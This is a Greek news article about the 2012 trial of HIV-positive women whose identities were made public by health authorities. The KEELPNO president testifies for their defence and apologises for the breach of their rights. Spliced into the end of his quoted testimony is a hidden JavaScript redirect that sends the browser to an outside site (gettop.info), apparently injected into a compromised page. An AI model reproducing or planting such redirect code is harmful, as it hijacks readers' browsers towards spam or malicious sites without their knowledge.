Πρόεδρος ΚΕΕΛΠΝΟ: Ζητώ συγγνώμη από τις οροθετικές γυναίκες

0
17

Ενώπιον του Τριμελούς Πλημμελειοδικείου ξεκίνησε η δίκη των οροθετικών γυναικών που είχαν συλληφθεί το 2012 ως «παράνομα εκδιδόμενες», είχαν υποχρεωθεί σε εξετάσεις και είχαν δημοσιοποιηθεί τα στοιχεία τους, βάσει διάταξης του τότε υπουργού Υγείας, Ανδρέα Λοβέρδου, η οποία είχε αναφορά σε αναγκαστικό νόμο του 1940 σχετικά με τον «περιορισμό της διάδοσης λοιμωδών νοσημάτων».

Στο εδώλιο του δικαστηρίου ήταν παρούσες οι τέσσερις, από τις 11 κατηγορούμενες, που είναι αντιμέτωπες για τα αδικήματα της βαριάς σκοπούμενης σωματικής βλάβης κατά συρροή και της παράβασης του νόμου περί εκδιδόμενων γυναικών. Τρεις από τις γυναίκες που περιλαμβάνονται στην δικογραφία δεν βρίσκονται στην ζωή.

Στο πλευρό των κατηγορουμένων βρέθηκε σήμερα και κατέθεσε ως μάρτυρας υπεράσπισής τους, ο πρόεδρος του ΚΕΕΛΠΝΟ, Θεόφιλος Ρόζενμπεργκ, ο οποίος ζήτησε συγγνώμη από τις γυναίκες για την «διαπόμπευσή τους με την δημοσιοποίηση των φωτογραφιών τους και των στοιχείων τους τον Απρίλιο του 2012».

Όπως ανέφερε ο κ. Ρόζενμπεργκ: «Είναι υποχρέωσή μου να πω δημοσίως ένα συγγνώμη για τη συμπεριφορά και μεταχείριση του ΚΕΕΛΠΝΟ στις γυναίκες αυτές. Πρόκειται για παραβίαση των δικαιωμάτων τους. Η διάγνωση οροθετικότητας είναι εντελώς απόρρητη και δεν μπορούν να δοθούν χωρίς άδεια από την Αρχή Προστασίας Προσωπικών Δεδομένων». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here